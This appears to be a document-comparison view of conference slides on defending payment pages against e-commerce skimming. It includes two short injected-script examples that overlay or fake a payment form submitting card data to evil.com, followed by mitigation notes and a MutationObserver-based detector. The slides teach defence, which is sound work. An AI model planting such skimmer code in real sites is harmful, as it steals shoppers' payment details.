Document Comparison
Day-2_Track-2_09_Jscrambler-Securing-Different-Types-Of-Payment-Pages-From-E-commerce-Skimming-Attacks.pdf → Day-2_Track-2_09_Jscrambler-Securing-Different-Types-Of-Payment-Pages-From-E-commerce-Skimming-Attacks.pdf
0% similar
Pages: 35 → 0
Words: 1203 → 0
Content Changes: 4 content changes. 1 administrative change (dates, page numbers) hidden.
Removed (p. 1)
Securing Different Types of Payment Pages from E-commerce Skimming Attacks
Pedro Fortuna, Jscrambler CTO & Co-Founder
• BoA @ PCI SSC
• 20+ years working in Security
• 13+ years defending websites from integrity attacks
• Several patents in AppSec
Some of my talks: OWASP AppSec Israel 2023; BSides San Francisco 2018, 2022, 2023; OWASP AppSec USA 2017, 2021; OWASP 20th Anniversary Conf 2021; OWASP Global AppSec Tel Aviv 2019; BSides Washington 2018; DEFCON PHV 2018; BSides Austin 2018; OWASP AppSec EU 2018; SecAppDev 2018, Leuven 2018; BSides Lisbon 2017, 2018, 2021, 2022, 2023; OWASP AppSec California 2017
• All payment pages aren't built the same way
• Different types of E-Skimming attack scenarios
• Key takeaways
What is E-Skimming?
[Attack-flow diagram; labels: Compromises a third-party component; Compromises target website via vulnerabilities or misconfigurations; Website is compromised; Performs a supply chain attack via the compromised third-party JavaScript; Web Skimmer steals payment information; Payment Information is sent to attacker]
Removed (p. 13)
Detect and block * Vendor needs to be monitoring event hijacking and/or access to
Scenario 2: Form Overlay
The payment page
compromised.js:
    const legit = document.getElementById("legit-form");
    const coordinates = legit.getBoundingClientRect();
    // injected form laid over the legitimate payment form
    const overlay = document.createElement("form");
    document.body.appendChild(overlay);
    overlay.style.setProperty("position", "absolute");
    overlay.setAttribute("action", "https://evil.com"); // attacker-controlled destination
    overlay.style.setProperty("z-index", "30");
    overlay.style.setProperty("width", `${coordinates.width}px`);
    overlay.style.setProperty("height", `${coordinates.height}px`);
    overlay.style.setProperty("top", `${coordinates.height}px`);
    overlay.style.setProperty("left", `${coordinates.height}px`);
    overlay.style.setProperty("right", `${coordinates.height}px`);
    overlay.style.setProperty("bottom", `${coordinates.height}px`);
Form Overlay Mitigation
SRI can in theory prevent a modified script from running, but it is impracticable due to third parties being updated all the
It can potentially detect the malicious code.
Removed (p. 16)
Detect and block * Vendor needs to be monitoring form-related behaviors, including access to forms
Scenario 3: A page before the payment page
compromised.js:
    // injected element that is not a real <form> but carries an action
    var fake_form = document.createElement("fake-form");
    fake_form.setAttribute("action", "https://evil.com"); // attacker-controlled destination
    var field1 = document.createElement("input");
    field1.setAttribute("name", "credit-card");
    /* … add a bunch of fake form fields … */
    document.querySelector("body").appendChild(fake_form);
Fake Form Mitigation
SRI can in theory prevent a modified script from running, but it is impracticable due to third parties being updated all the
It can potentially detect the fake form and/or the malicious code.
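Both injected-element scenarios above (the absolutely positioned overlay on the payment page, and the fake form planted on an earlier page) are what the "monitor new behaviors and authorize them" approach on the slides has to catch at runtime. The following is an added example written for this page, not code from the slides or from Jscrambler: a policy check that flags an element whose action host is not allowlisted, an absolutely positioned element that covers the legitimate payment form, or a non-form element carrying an action attribute, plus a MutationObserver hook that feeds newly inserted elements and changed action/style attributes into that check. The page origin https://shop.example, the allowlisted host checkout.example.com, the sample descriptors and the 0.5 overlap threshold are assumptions constructed for the example; the id legit-form is taken from the slide.

```javascript
// Added example (not from the slides or from Jscrambler): a small form-behaviour
// monitor. Assumptions (constructed for this example): page origin, the allowlisted
// submission host, the overlap threshold and the sample element descriptors.

const ALLOWED_FORM_HOSTS = new Set(["checkout.example.com"]); // assumed allowlist

// Decide whether an action URL may receive payment data. An empty or relative
// action submits to the page's own origin, which is treated as allowed.
function classifyFormAction(action, pageOrigin) {
  const page = new URL(pageOrigin);
  if (!action) return { allowed: true, host: page.host };
  let target;
  try {
    target = new URL(action, pageOrigin);
  } catch (e) {
    return { allowed: false, host: null, reason: "unparseable action" };
  }
  if (target.origin === page.origin) return { allowed: true, host: target.host };
  if (ALLOWED_FORM_HOSTS.has(target.host)) return { allowed: true, host: target.host };
  return { allowed: false, host: target.host, reason: "action host not allowlisted" };
}

// Fraction of rectangle b (the legitimate form) that rectangle a covers.
function overlapRatio(a, b) {
  const w = Math.max(0, Math.min(a.left + a.width, b.left + b.width) - Math.max(a.left, b.left));
  const h = Math.max(0, Math.min(a.top + a.height, b.top + b.height) - Math.max(a.top, b.top));
  const areaB = b.width * b.height;
  return areaB === 0 ? 0 : (w * h) / areaB;
}

// Evaluate one element described as plain data so the policy also runs outside a
// browser. Returns human-readable findings; an empty list means the element is allowed.
function evaluateForm(desc, legitRect, pageOrigin) {
  const findings = [];
  const verdict = classifyFormAction(desc.action, pageOrigin);
  if (!verdict.allowed) findings.push(`submits to ${verdict.host ?? "?"}: ${verdict.reason}`);
  // Scenario 2: an absolutely positioned element laid over the real payment form.
  if (desc.position === "absolute" && legitRect && overlapRatio(desc.rect, legitRect) > 0.5) {
    findings.push("absolutely positioned element covers the payment form");
  }
  // Scenario 3: a non-<form> element (e.g. <fake-form>) carrying an action attribute.
  if (desc.tagName !== "FORM" && desc.action) {
    findings.push(`non-form element <${desc.tagName.toLowerCase()}> carries an action attribute`);
  }
  return findings;
}

// Constructed sample: the legitimate form, an allowlisted PSP form, and the two
// injected elements from the slides, written as descriptors.
const PAGE_ORIGIN = "https://shop.example";
const LEGIT_RECT = { top: 100, left: 50, width: 400, height: 300 };
const SAMPLE_ELEMENTS = {
  legit: { tagName: "FORM", action: "/checkout/submit", position: "static", rect: LEGIT_RECT },
  psp: { tagName: "FORM", action: "https://checkout.example.com/pay", position: "static",
         rect: { top: 500, left: 50, width: 400, height: 120 } },
  overlay: { tagName: "FORM", action: "https://evil.com", position: "absolute", rect: { ...LEGIT_RECT } },
  fake: { tagName: "FAKE-FORM", action: "https://evil.com", position: "static",
          rect: { top: 0, left: 0, width: 0, height: 0 } },
};

function runSample() {
  const out = {};
  for (const [name, desc] of Object.entries(SAMPLE_ELEMENTS)) out[name] = evaluateForm(desc, LEGIT_RECT, PAGE_ORIGIN);
  return out;
}

// Browser wiring: turn a live element into a descriptor and watch the DOM for
// inserted elements and for changes to action/style attributes.
function describeElement(el) {
  const cs = getComputedStyle(el);
  const r = el.getBoundingClientRect();
  return { tagName: el.tagName, action: el.getAttribute("action") || "", position: cs.position,
           rect: { top: r.top, left: r.left, width: r.width, height: r.height } };
}

function startFormMonitor(legitFormId, onFinding) {
  const legit = document.getElementById(legitFormId);
  const legitRect = legit ? legit.getBoundingClientRect() : null;
  const check = (el) => {
    const f = evaluateForm(describeElement(el), legitRect, location.origin);
    if (f.length) onFinding(el, f);
  };
  const observer = new MutationObserver((records) => {
    for (const m of records) {
      if (m.type === "attributes") { check(m.target); continue; }
      for (const n of m.addedNodes) {
        if (n.nodeType !== 1) continue;
        if (n.matches("form, [action]")) check(n);
        n.querySelectorAll("form, [action]").forEach(check);
      }
    }
  });
  observer.observe(document.documentElement,
    { childList: true, subtree: true, attributes: true, attributeFilter: ["action", "style"] });
  return observer;
}

if (typeof document !== "undefined") {
  startFormMonitor("legit-form", (el, findings) => console.warn("form policy violation:", findings, el));
} else {
  console.log(runSample()); // Node: print verdicts for the constructed samples
}
```

Run under Node to see the verdicts for the four constructed descriptors (only the overlay and the fake form produce findings); included in a page after the legitimate form has rendered, it arms the observer instead. The check is deliberately split from the DOM wiring so the allowlist and overlap rules can be unit-tested and tuned without a browser; what to do on a finding (report, block submission, remove the element) is a policy decision left to the caller.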
Removed (p. 34)
Key Takeaways
• eSkimming attacks are going beyond simple skimming of the payment form
• The parent page or even other pages can also be targeted
• Securing payment data properly requires more than controlling where websites load code from and what domains they send data to
• For example, controlling form and iframe behaviors is just as important
• Securing payments scales better by monitoring new behaviors and authorizing them
• Beware the danger of Script Usurpation, as it can help bypass monitoring policies
Thank you!